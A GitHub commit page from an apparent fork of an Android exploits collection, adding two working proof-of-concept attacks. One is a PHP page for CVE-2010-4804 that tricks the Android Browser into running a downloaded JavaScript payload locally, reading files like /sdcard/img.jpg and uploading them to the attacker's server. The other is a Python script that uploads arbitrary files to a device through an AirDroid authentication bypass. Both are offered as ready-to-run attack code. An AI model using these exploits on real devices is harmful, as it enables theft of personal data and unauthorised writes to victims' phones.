forked from sundaysec/Android-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
157 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,121 @@ | ||
| <?php | ||
| /* | ||
| * Description: Android 'content://' URI Multiple Information Disclosure Vulnerabilities | ||
| * Bugtraq ID: 48256 | ||
| * CVE: CVE-2010-4804 | ||
| * Affected: Android < 2.3.4 | ||
| * Author: Thomas Cannon | ||
| * Discovered: 18-Nov-2010 | ||
| * Advisory: http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/ | ||
| * | ||
| * Filename: poc.php | ||
| * Instructions: Specify files you want to upload in filenames array. Host this php file | ||
| * on a server and visit it using the Android Browser. Some builds of Android | ||
| * may require adjustments to the script, for example when a German build was | ||
| * tested it downloaded the payload as .htm instead of .html, even though .html | ||
| * was specified. | ||
| * | ||
| * Tested on: HTC Desire (UK Version) with Android 2.2 | ||
| */ | ||
|
|
||
| // List of the files on the device that we want to upload to our server | ||
| $filenames = array("/proc/version","/sdcard/img.jpg"); | ||
|
|
||
| // Determine the full URL of this script | ||
| $protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http"; | ||
| $scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]; | ||
|
|
||
| // Stage 0: Display introduction text and a link to start the PoC. | ||
| function stage0($scripturl) { | ||
| echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>"; | ||
| } | ||
|
|
||
| // Stage 1: Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect | ||
| // to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the | ||
| // context of the local device - this is the vulnerability. | ||
| function stage1($scripturl) { | ||
| echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">"; | ||
| } | ||
|
|
||
| // Stage 2: Download of payload, the Android browser doesn't prompt for the download which is another vulnerability. | ||
| // The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3). | ||
| function stage2($scripturl,$filenames) { | ||
| header("Cache-Control: public"); | ||
| header("Content-Description: File Transfer"); | ||
| header("Content-Disposition: attachment; filename=poc.html"); | ||
| header("Content-Type: text/html"); | ||
| header("Content-Transfer-Encoding: binary"); | ||
| ?> | ||
| <html> | ||
| <body> | ||
| <script language='javascript'> | ||
| var filenames = Array('<?php echo implode("','",$filenames); ?>'); | ||
| var filecontents = new Array(); | ||
| function processBinary(xmlhttp) { | ||
| data = xmlhttp.responseText; r = ''; size = data.length; | ||
| for(var i = 0; i < size; i++) r += String.fromCharCode(data.charCodeAt(i) & 0xff); | ||
| return r; | ||
| } | ||
| function getFiles(filenames) { | ||
| for (var filename in filenames) { | ||
| filename = filenames[filename]; | ||
| xhr = new XMLHttpRequest(); | ||
| xhr.open('GET', filename, false); | ||
| xhr.overrideMimeType('text/plain; charset=x-user-defined'); | ||
| xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } } | ||
| xhr.send(); | ||
| } | ||
| } | ||
| function addField(form, name, value) { | ||
| var fe = document.createElement('input'); | ||
| fe.setAttribute('type', 'hidden'); | ||
| fe.setAttribute('name', name); | ||
| fe.setAttribute('value', value); | ||
| form.appendChild(fe); | ||
| } | ||
| function uploadFiles(filecontents) { | ||
| var form = document.createElement('form'); | ||
| form.setAttribute('method', 'POST'); | ||
| form.setAttribute('enctype', 'multipart/form-data'); | ||
| form.setAttribute('action', '<?=$scripturl?>?stage=3'); | ||
| var i = 0; | ||
| for (var filename in filecontents) { | ||
| addField(form, 'filename'+i, btoa(filename)); | ||
| addField(form, 'data'+i, filecontents[filename]); | ||
| i += 1; | ||
| } | ||
| document.body.appendChild(form); | ||
| form.submit(); | ||
| } | ||
| getFiles(filenames); | ||
| uploadFiles(filecontents); | ||
| </script> | ||
| </body> | ||
| </html> | ||
| <?php | ||
| } | ||
|
|
||
| // Stage 3: Read the file names and contents sent by the payload and write to a file on the server. | ||
| function stage3() { | ||
| $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!"); | ||
| fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!"); | ||
| fclose($fp); | ||
| echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!"; | ||
| } | ||
|
|
||
| // Select the stage to run depending on the parameter passed in the URL | ||
| switch($_GET["stage"]) { | ||
| case "1": | ||
| stage1($scripturl); | ||
| break; | ||
| case "2": | ||
| stage2($scripturl,$filenames); | ||
| break; | ||
| case "3": | ||
| stage3(); | ||
| break; | ||
| default: | ||
| stage0($scripturl); | ||
| break; | ||
| } | ||
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| #/IN THE NAME OF GOD | ||
| #/auth====PARSA ADIB | ||
|
|
||
| import sys,requests,re,urllib2 | ||
| def logo(): | ||
| print"\t\t .__ .___ .__ .___" | ||
| print"\t\t_____ |__|______ __| _/______ ____ |__| __| _/" | ||
| print"\t\t\__ \ | \_ __ \/ __ |\_ __ \/ _ \| |/ __ | " | ||
| print"\t\t / __ \| || | \/ /_/ | | | \( <_> ) / /_/ | " | ||
| print"\t\t(____ /__||__| \____ | |__| \____/|__\____ | " | ||
| print"\t\t \/ \/ \/ " | ||
| print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib" | ||
| if len(sys.argv)<6 or len(sys.argv)>6 : | ||
| logo() | ||
| print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path" | ||
| print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard" | ||
| else : | ||
| logo() | ||
| print "\n[+]Reciving Details\n-----------------------------" | ||
| try : | ||
| p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/') | ||
| except IOError : | ||
| print "\n[!] Check If server is Running" | ||
| sys.exit() | ||
| for i in p.content.split(',') : | ||
| for char in '{"}_': | ||
| i = i.replace(char,'').upper() | ||
| print "[*]"+i+"" | ||
| print "\n[+]Sending File\n-----------------------------" | ||
| try : | ||
| r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()}) | ||
| if (r.status_code == 200) : | ||
| print "[*]RESPONSE:200" | ||
| print "[*]FILE SENT SUCCESSFULY" | ||
| except IOError : | ||
| print "\n[!] Error" |